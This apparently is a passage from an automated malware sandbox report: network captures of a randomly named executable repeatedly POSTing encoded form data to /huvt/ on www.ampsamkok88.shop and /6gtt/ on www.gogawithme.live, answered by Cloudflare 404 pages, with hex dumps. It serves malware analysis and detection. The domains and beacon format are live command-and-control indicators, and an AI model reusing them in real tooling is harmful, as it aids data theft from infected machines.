                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                        Pragma: no-cache
                                                                                                                        Set-Cookie: sessionid=l3f38bf2go89nh2na4t17evr50; expires=Sun, 19-Nov-2034 15:22:35 GMT; Max-Age=315360000; path=/
                                                                                                                        Data Raw: 32 36 38 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 75 62 6c 69 63 2f 6a 61 76 61 73 63 72 69 70 74 2f 6a 71 75 65 72 79 2d 32 2e 32 2e 33 2e 6d 69 6e 2e 6a 73 3f 76 3d 22 20 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 64 61 35 63 33 3b 22 3e 0a 3c 69 6d 67 20 73 74 79 6c 65 3d 27 6d 61 78 2d 77 69 64 74 68 3a 20 34 30 30 70 78 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c [TRUNCATED]
                                                                                                                        Data Ascii: 268<html><head> <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" /> <script src="/public/javascript/jquery-2.2.3.min.js?v=" type="text/javascript"></script></head><body style="background-color: #6da5c3;"><img style='max-width: 400px;width: 100%;position: absolute;right: 0;top: 30%;left: 0;margin: 0 auto;' src="/public/image/404.png"/>...<h1 style='width: 400px;position: absolute;margin-left: -200px;margin-top: -80px;top: 50%;left: 50%;display: block;z-index: 2000;color:#FB7C7C;text-align: center'> 404 Not Found </h1>--></body></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        29192.168.2.950003172.67.209.48806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:41.420078993 CET604OUTPOST /huvt/ HTTP/1.1
                                                                                                                        Host: www.ampsamkok88.shop
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.ampsamkok88.shop
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 36 65 38 69 65 39 53 76 70 54 2b 72 38 6a 6f 6b 73 32 31 35 50 36 31 57 62 67 4e 34 74 54 36 63 7a 63 31 6a 47 52 50 39 6d 61 35 4b 6e 4a 4b 36 64 38 44 51 53 78 51 43 64 57 52 39 68 77 66 5a 63 59 31 39 38 65 4e 75 5a 46 6a 52 52 4f 6c 73 35 62 4a 49 71 2f 41 73 77 49 71 46 6c 65 57 71 4c 34 35 63 56 2b 33 77 51 4e 4f 57 75 33 6b 69 31 63 73 76 6b 59 71 73 4c 53 47 54 64 4e 37 48 59 4f 56 56 58 50 78 72 6f 46 34 66 50 51 79 6c 31 37 46 4f 6d 66 2f 67 44 69 76 47 4b 37 5a 47 63 79 56 42 4a 6c 5a 73 32 34 79 50 78 6b 69 56
                                                                                                                        Data Ascii: bBw=/z/07yxfDjX26e8ie9SvpT+r8joks215P61WbgN4tT6czc1jGRP9ma5KnJK6d8DQSxQCdWR9hwfZcY198eNuZFjRROls5bJIq/AswIqFleWqL45cV+3wQNOWu3ki1csvkYqsLSGTdN7HYOVVXPxroF4fPQyl17FOmf/gDivGK7ZGcyVBJlZs24yPxkiV
                                                                                                                        Nov 21, 2024 16:22:42.641472101 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:22:42 GMT
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BjKVYOoOrM11IgIlfh1%2Bf2WxSOXkBcXa5Ddz0z8EyzZud1gcrcKiOOtjw%2FXu5%2BeqTEmf5N3%2FD3kJRyslTP3UrLOIgI2GIP3dOe1LSFxtcRPDFwRdyxGQFyniT4YuuaUJj4ciQed8Yw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61ad3eca210f70-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1580&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=604&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 32 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0b a5 92 21 b5 92 ae 6c a3 fe 01 6d 92 b2 42 d2 96 2d 65 8c 31 8a 2c 9d 6d 15 47 f2 24 25 21 4b fc bf 0f db 69 9a 15 da b1 0f 06 49 f7 de bd bb d3 b3 c2 77 a3 db e1 ec fb dd 18 7d 9e 4d 27 e8 ee fe 72 72 3d 44 dd 13 4a af c7 b3 2b 4a 47 b3 51 1b 39 f5 fb 94 8e 6f ba 71 27 cc dd bc 88 c3 1c 98 88 3b a1 93 ae 80 f8 ac 7f 86 6e b4 43 57 7a a1 44 48 db c3 4e 48 1b 50 98 68 b1 ae 79 83 f8 00 93 0f e2 4e 58 c6 b3 1c 90 81 5f 0b b0 0e 04 ba ff 32 41 2b 66 91 d2 0e a5 35 0e 69 85 5c 2e 2d b2 60 96 60 fc 90 96 0d ed 42 08 e9 a4 56 ac 28 d6 3d c4 d0 5f 05 74 c0 18 6d 9a 44 a0 b8 5e 28 07 06 04 5a e5 b2 00 e4 cc 5a aa 0c 39 8d 16 16 10 53 68 5c 83 47 9a 2f e6 a0 5c 7d 9e 33 25 6a e0 73 65 3b 59 cb 8d 2c 5d 4c d2 85 e2 b5 38 f1 36 4f 4b c4 89 b7 59 32 83 92 88 f9 5c 2b 07 ca 3d e5 dc 6e f7 47 df a4 12 7a e5 8b 5d 24 90 29 49 5a 9e 88 12 9f 1b 60 0e c6 05 d4 31 82 5b 39 ec 05 c2 97 4a 81 a9 ef 21 ea ae da 14 0f 0f c3 ab 23 be 3c 2a 99 [TRUNCATED]
                                                                                                                        Data Ascii: 2a6Tk0B!lmB-e1,mG$%!KiIw}M'rr=DJ+JGQ9oq';nCWzDHNHPhyNX_2A+f5i\.-``BV(=_tmD^(ZZ9Sh\G/\}3%jse;Y,]L86OKY2\+=nGz]$)IZ`1[9J!#<*asm9LNc9jx:g"\,jyUJ+\IsV28)RmYh3GF
                                                                                                                        Nov 21, 2024 16:22:42.641494989 CET264INData Raw: 6e 27 60 2f d7 33 96 dd b0 39 10 5c bb 04 7b 3f fa 3f 7d 56 96 a0 c4 30 97 85 20 cc 0b ba 41 f2 5f 14 e1 55 95 4c c9 5e ae 36 5e 3b de d7 fb 94 a9 61 73 68 fa cc 41 66 b9 8b 06 01 f3 57 52 b8 bc 59 59 b7 2e c0 2f b5 6d fc 16 61 96 58 5d 2c 1c e0
                                                                                                                        Data Ascii: n'`/39\{??}V0 A_UL^6^;ashAfWRYY./maX],}2w`h#DXiu@YJ+YHp.u0)fB1c<NHdg&xMux{5D3x<KjZLeU2o$tu|LJ=N<#^yrB<U
                                                                                                                        Nov 21, 2024 16:22:42.642147064 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        30192.168.2.950004172.67.209.48806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:44.083441973 CET628OUTPOST /huvt/ HTTP/1.1
                                                                                                                        Host: www.ampsamkok88.shop
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.ampsamkok88.shop
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 34 2b 4d 69 53 36 2b 76 34 44 2b 73 67 54 6f 6b 33 47 30 2b 50 36 70 57 62 6b 55 6e 74 6c 69 63 79 39 46 6a 48 54 72 39 32 4b 35 4b 79 35 4b 37 54 63 44 62 53 78 63 38 64 58 39 39 68 77 4c 5a 63 64 4a 39 37 76 4e 70 59 56 6a 54 64 75 6c 75 6b 4c 4a 49 71 2f 41 73 77 49 75 72 6c 65 4f 71 4c 4c 78 63 57 66 33 7a 54 4e 4f 56 70 33 6b 69 2f 38 73 72 6b 59 71 43 4c 54 62 38 64 4f 44 48 59 4f 6c 56 58 62 74 73 6a 46 34 6a 4c 51 7a 41 77 34 73 58 68 74 79 2f 42 56 66 48 59 74 35 35 62 54 70 66 59 58 51 33 6a 76 79 6f 32 44 72 39 5a 63 41 6f 2f 53 71 64 61 34 51 5a 4d 36 78 54 77 57 61 53 53 77 3d 3d
                                                                                                                        Data Ascii: bBw=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlicy9FjHTr92K5Ky5K7TcDbSxc8dX99hwLZcdJ97vNpYVjTdulukLJIq/AswIurleOqLLxcWf3zTNOVp3ki/8srkYqCLTb8dODHYOlVXbtsjF4jLQzAw4sXhty/BVfHYt55bTpfYXQ3jvyo2Dr9ZcAo/Sqda4QZM6xTwWaSSw==
                                                                                                                        Nov 21, 2024 16:22:45.356559038 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:22:45 GMT
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gMZGK1ElQpsQRBkpCuE1BjbMBg2uqWfXOyBUdqIHgN5iPAiDPHbk9LFDu1xJhT68UUsAhmtUbbVAv8MHp7RJvA2QJ9LOdIMTkre5VvuWGrdfrLdM3xU01gOsWkTD02nBcY9YsBxR1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61ad4fbe7142ea-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1611&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=628&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 32 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0b a5 92 21 b5 9b 12 b6 51 ff 80 36 49 59 21 49 cb 9a 32 c6 18 45 96 ce b1 82 22 79 92 92 90 25 fe df 87 ed 34 cd 0a ed d8 07 83 a4 7b ef de dd e9 59 d1 87 c1 5d 7f fa fd 7e 88 be 4c c7 23 74 ff 78 3d ba ed a3 f6 59 10 dc 0e a7 37 41 30 98 0e 9a c8 85 7f 1e 04 c3 49 3b 69 45 b9 5b c8 24 ca 81 f2 a4 15 39 e1 24 24 bd f3 1e 9a 68 87 6e f4 52 f1 28 68 0e 5b 51 50 83 a2 54 f3 4d c5 eb 26 47 98 bc 9b b4 a2 22 99 e6 80 0c fc 5a 82 75 c0 d1 e3 d7 11 5a 53 8b 94 76 28 ab 70 48 2b e4 72 61 91 05 b3 02 e3 47 41 51 d3 ae 38 17 4e 68 45 a5 dc 74 10 45 7f 15 d0 02 63 b4 a9 13 81 62 7a a9 1c 18 e0 68 9d 0b 09 c8 99 8d 50 33 e4 34 5a 5a 40 54 a1 61 05 1e 68 b6 5c 80 72 d5 79 4e 15 af 80 2f 95 ed 65 2d 33 a2 70 09 c9 96 8a 55 e2 c4 db 3e 2f 11 23 de 76 45 0d 4a 63 ea 33 ad 1c 28 f7 9c 73 b7 3b 1c 7d 13 8a eb b5 cf f7 91 50 64 24 6d 78 3c 4e 7d 66 80 3a 18 4a a8 62 04 37 72 d8 0b b9 2f 94 02 53 dd 43 dc 5e 37 29 9e 9e fa 37 27 6c 75 52 50 [TRUNCATED]
                                                                                                                        Data Ascii: 2a6Tk0B!Q6IY!I2E"y%4{Y]~L#tx=Y7A0I;iE[$9$$hnR(h[QPTM&G"ZuZSv(pH+raGAQ8NhEtEcbzhP34ZZ@Tah\ryN/e-3pU>/#vEJc3(s;}Pd$mx<N}f:Jb7r/SC^7)7'luRPC6K>v)e)|.)=Co=\U_s-oS_i 85,Dr*%LEl0<XPAcn/`7S:
                                                                                                                        Nov 21, 2024 16:22:45.356585026 CET261INData Raw: d0 05 10 5c b9 04 7b 3f ce 7f fa b4 28 40 f1 7e 2e 24 27 d4 0b db 61 fa 5f 14 ee 95 a5 c8 c8 41 ae 32 5e 33 de b7 fb 14 99 a1 0b a8 fb cc 41 cc 72 17 77 43 ea af 05 77 79 bd b2 6e 23 c1 2f b4 ad fd 16 63 9a 5a 2d 97 0e f0 21 e6 74 11 9f 1f 76 12
                                                                                                                        Data Ascii: \{?(@~.$'a_A2^3ArwCwyn#/cZ-!tv2wM`b:mbA$DF5fPypDF&WHXw<4q5VDYNv?A`m^NO{eYz((?b


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        31192.168.2.950005172.67.209.48806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:46.856908083 CET1641OUTPOST /huvt/ HTTP/1.1
                                                                                                                        Host: www.ampsamkok88.shop
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.ampsamkok88.shop
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 34 2b 4d 69 53 36 2b 76 34 44 2b 73 67 54 6f 6b 33 47 30 2b 50 36 70 57 62 6b 55 6e 74 6c 71 63 79 50 39 6a 42 7a 58 39 31 4b 35 4b 7a 35 4b 2b 54 63 44 4b 53 78 45 34 64 58 42 48 68 79 7a 5a 54 59 46 39 2b 62 68 70 57 6c 6a 54 41 2b 6c 76 35 62 4a 6e 71 2f 77 57 77 49 2b 72 6c 65 4f 71 4c 4e 56 63 43 65 33 7a 56 4e 4f 57 75 33 6b 75 31 63 74 32 6b 65 44 2f 4c 54 66 57 63 2b 6a 48 57 4b 42 56 53 6f 46 73 2f 56 34 62 4f 51 7a 69 77 34 77 79 68 74 76 41 42 51 4c 74 59 71 4e 35 5a 58 77 2b 4b 32 4d 47 69 76 32 6c 68 68 6a 69 52 39 77 61 34 7a 4c 68 50 4b 49 39 61 61 45 4d 35 31 71 5a 45 30 4a 70 6b 39 43 6d 4c 37 38 45 33 35 69 5a 30 50 72 76 53 34 31 56 6c 31 59 48 49 6b 56 69 4e 77 52 4d 35 44 36 69 30 71 35 47 6c 31 47 38 78 69 7a 45 62 64 31 4f 38 33 55 70 42 47 38 35 4e 7a 64 55 64 5a 48 43 50 36 64 58 77 52 35 72 36 4c 74 4f 72 78 67 45 56 76 43 2b 67 37 36 4b 57 68 30 50 58 50 58 45 32 37 44 4f 51 74 47 62 2b 35 50 36 55 67 42 41 79 56 33 62 6e 56 [TRUNCATED]
                                                                                                                        Data Ascii: bBw=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlqcyP9jBzX91K5Kz5K+TcDKSxE4dXBHhyzZTYF9+bhpWljTA+lv5bJnq/wWwI+rleOqLNVcCe3zVNOWu3ku1ct2keD/LTfWc+jHWKBVSoFs/V4bOQziw4wyhtvABQLtYqN5ZXw+K2MGiv2lhhjiR9wa4zLhPKI9aaEM51qZE0Jpk9CmL78E35iZ0PrvS41Vl1YHIkViNwRM5D6i0q5Gl1G8xizEbd1O83UpBG85NzdUdZHCP6dXwR5r6LtOrxgEVvC+g76KWh0PXPXE27DOQtGb+5P6UgBAyV3bnVnuxxb7UKZbHct2lBeIqnfTGhBB2TMFJ/8GAwS3vAwkQCtFxJOs54cu66bGjyC8TyLkP4ttWPJ9NFhlJ/5dK8kBKyINmRY2zBTRXZx949zs7lPdPCwNYjTY2JAqSbFNtIr5QxY8sQy9RPpy74Lk3v/4P5Il0UWT5O/RlCafjl9nOs/5mx+35r0br8bkaycAROeXf5iB7hec6hTuD/NOPsUBtZsFwuONy8VfU+yR1NhhyoRdwsXcvKQMHeF4UA0TYgzK6MLfpe3s+Rk3k1lVWEoOeARMxzKm15X3iqdEFIqrxXDUCqnYiVxYVk7nsg6xfyBhBIESYntKedE6hY1vEtHoCptRdF6aZlxlGU05GGsivEQWDTvhTRjaUUoI/GiEIopT1h1m7qLOFvH3nYih1GwetHxJVjlGdys0q8d7rJ5y7XdZxwm5kK4Mlg5GlMPIVcsMX89QMLibGknZCeqJZPArFkdaiCzu3O74Yza7AmhMwrdC+zkZLLje9t0mlbCbQwh9Vdvz1jxWP3fVo55i1d3uhqim7bLR9zjBMaQUGxwWnNjQSgkSHZRcpfXV+cj73Xe18lFc3WkQGI1SZyzy80khPcTJ/2170tpTblNQWivG5sVnPwi9XJI27HN1ewaL2aKQwWxQIB0O6gHIoy8/D71wAIfgJy7SYvGV [TRUNCATED]
                                                                                                                        Nov 21, 2024 16:22:48.037244081 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:22:47 GMT
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WNJHNMP1s4YqATvDiWrCgeCuP33KOWUl9QLx7VCZa6ggiLLWkglY3iE%2BG6vJnnWhLyQ7YBz1%2Fz0G%2Fk5NvqwGbipoEPRh6EOWWlAz1FGij3c9o2fzExkQLVDz4t9%2FDU9hIeZweCxwEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61ad6079ea32d0-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3123&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1641&delivery_rate=0&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 32 62 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0d a5 b2 21 b5 d2 ae 74 5b fd 03 ba 24 65 85 24 2d 5b ca 18 63 14 59 3a db 0a 8e e4 49 4a 82 97 f8 7f 1f b6 d3 34 2b b4 63 1f 0c 92 ee bd 7b 77 a7 67 05 47 c3 bb c1 ec fb fd 08 7d 9e 4d c6 e8 fe e1 d3 f8 76 80 ba a7 84 dc 8e 66 37 84 0c 67 c3 36 72 ee f5 09 19 4d bb 51 27 c8 ec 22 8f 82 0c 28 8f 3a 81 15 36 87 e8 a2 7f 81 a6 ca a2 1b b5 94 3c 20 ed 61 27 20 0d 28 88 15 2f 6b de 59 74 80 c9 ce a2 4e 50 44 b3 0c 90 86 5f 4b 30 16 38 7a f8 32 46 6b 6a 90 54 16 25 35 0e 29 89 6c 26 0c 32 a0 57 a0 bd 80 14 0d ed 9a 73 61 85 92 34 cf cb 1e a2 e8 af 02 3a a0 b5 d2 4d 22 90 4c 2d a5 05 0d 1c ad 33 91 03 b2 ba 14 32 45 56 a1 a5 01 44 25 1a d5 e0 a1 62 cb 05 48 5b 9f 67 54 f2 1a f8 5c d9 4e d6 30 2d 0a 1b 39 c9 52 b2 5a dc 71 37 4f 4b c4 1c 77 b3 a2 1a c5 21 f5 98 92 16 a4 7d ca b9 dd ee 8f be 09 c9 d5 da e3 bb 88 2f 12 27 6e 79 3c 8c 3d a6 81 5a 18 e5 50 c7 1c dc ca 61 d7 e7 9e 90 12 74 7d 0f 61 77 dd a6 78 7c 1c dc 1c b3 d5 71 41 [TRUNCATED]
                                                                                                                        Data Ascii: 2b2Tk0B!t[$e$-[cY:IJ4+c{wgG}Mvf7g6rMQ'"(:6< a' (/kYtNPD_K08z2FkjT%5)l&2Wsa4:M"L-32EVD%bH[gT\N0-9RZq7OKw!}/'ny<=ZPat}awx|qA5]p<#w{Ofd~z2W~-KZ^UTAO=Y9NDii'*77k
                                                                                                                        Nov 21, 2024 16:22:48.037290096 CET266INData Raw: a4 60 77 02 e6 53 39 a3 e9 94 2e c0 c1 b5 4b b0 fb a3 ff d3 a3 45 01 92 0f 32 91 73 87 ba 7e d7 8f ff 8b c2 dd aa 12 89 b3 97 ab 8d d7 8e f7 f5 3e 45 a2 e9 02 9a 3e 33 10 69 66 c3 33 9f 7a 6b c1 6d d6 ac 8c 2d 73 f0 0a 65 1a bf 85 98 c6 46 e5 4b
                                                                                                                        Data Ascii: `wS9.KE2s~>E>3if3zkm-seFKx]=Js!JPVX! TWr"qp(2Gs3(/ZjeCnr>Zca,H2dt({%lDM-2*Sn'vturzq*q`(


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        32192.168.2.950006172.67.209.48806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:49.609829903 CET342OUTGET /huvt/?bBw=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPcijKU85s4sBliMM2+p3cutSfMcIpXQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.ampsamkok88.shop
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:22:50.900764942 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:22:50 GMT
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=En%2BN%2BPcwoi8J4UHt61U1AZt8GLf4%2F%2FaB86evH%2Bv6dcGDcDNlvLNoQIT3y8mSYLvwvipgtgFbHaI01pQnyLPae70cJoJxzdpmWegBU4Y1EZWz7VHhyhP6rgPEGM4%2B91i90LSHdytFHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61ad724b5943b0-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2099&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=342&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 34 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b [TRUNCATED]
                                                                                                                        Data Ascii: 4e5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$par
                                                                                                                        Nov 21, 2024 16:22:50.900789976 CET808INData Raw: 61 6d 73 3d 7b 72 3a 27 38 65 36 31 61 64 37 32 34 62 35 39 34 33 62 30 27 2c 74 3a 27 4d 54 63 7a 4d 6a 49 77 4d 6a 55 33 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65
                                                                                                                        Data Ascii: ams={r:'8e61ad724b5943b0',t:'MTczMjIwMjU3MC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName(


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        33192.168.2.950007209.74.77.109806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:56.474909067 CET601OUTPOST /6gtt/ HTTP/1.1
                                                                                                                        Host: www.gogawithme.live
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.gogawithme.live
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
